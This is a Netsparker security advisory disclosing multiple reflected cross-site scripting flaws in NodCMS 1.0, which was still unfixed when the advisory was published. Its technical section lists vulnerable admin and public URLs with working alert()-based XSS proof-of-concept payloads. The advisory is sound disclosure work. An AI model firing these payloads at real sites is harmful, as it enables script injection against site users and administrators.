Information
--------------------
Advisory by Netsparker
Name: Multiple Reflected XSS Vulnerabilities in NodCMS 1.0
Affected Software : NodCMS 1.0
Affected Versions: 1.0
Vendor Homepage : http://www.nodcms.com/en 
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Not Fixed
Netsparker Advisory Reference : NS-17-004

Technical Details
--------------------

Proof of Concept URL for XSSes vulnerabilities in NodCMS;

Url /NodCMS-1.0/admin/menu_manipulate
Parameter Name data%5bmenu_name%5d
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0669E6)</scRipt>

Url /NodCMS-1.0/admin/menu_manipulate
Parameter Name data%5bmenu_icon%5d
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0669E4)</scRipt>

Url /NodCMS-1.0/de
Parameter Name Query Based
Attack Pattern '"--></style></scRipt><scRipt>alert(0x05816A)</scRipt>

Url /NodCMS-1.0/en
Parameter Name Query Based
Attack Pattern '"--></style></scRipt><scRipt>alert(0x051C06)</scRipt>

Url /NodCMS-1.0/en/contact
Parameter Name Query Based
Attack Pattern '"--></style></scRipt><scRipt>alert(0x057E72)</scRipt>

Url /NodCMS-1.0/en/extension/37
Parameter Name Query Based
Attack Pattern '"--></style></scRipt><scRipt>alert(0x058C18)</scRipt>

Url /NodCMS-1.0/en/extension/38
Parameter Name Query Based
Attack Pattern '"--></style></scRipt><scRipt>alert(0x058B5A)</scRipt>

Url /NodCMS-1.0/en/extension/39
Parameter Name Query Based
Attack Pattern '"--></style></scRipt><scRipt>alert(0x058A9C)</scRipt>

Url /NodCMS-1.0/en/login
Parameter Name Query Based
Attack Pattern '"--></style></scRipt><scRipt>alert(0x057F30)</scRipt>

Url /NodCMS-1.0/en/page/1
Parameter Name Query Based
Attack Pattern '"--></style></scRipt><scRipt>alert(0x058228)</scRipt>

Url /NodCMS-1.0/en/page/2
Parameter Name Query Based
Attack Pattern '"--></style></scRipt><scRipt>alert(0x058228)</scRipt>

Url /NodCMS-1.0/en/register
Parameter Name Query Based
Attack Pattern '"--></style></scRipt><scRipt>alert(0x057FEE)</scRipt>

Url /NodCMS-1.0/fa
Parameter Name Query Based
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0580AC)</scRipt>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------
24 Nov 2016 - Issue reported
Nov 2016 - Jan 2017 - Several attempts to get in touch
01 Feb 2017 - Advisory released

Solution
--------------------
No solution available at the time of publishing of this advisory.

Credits & Authors
--------------------
This issues has been discovered by Emre Iyidogan while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine's unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.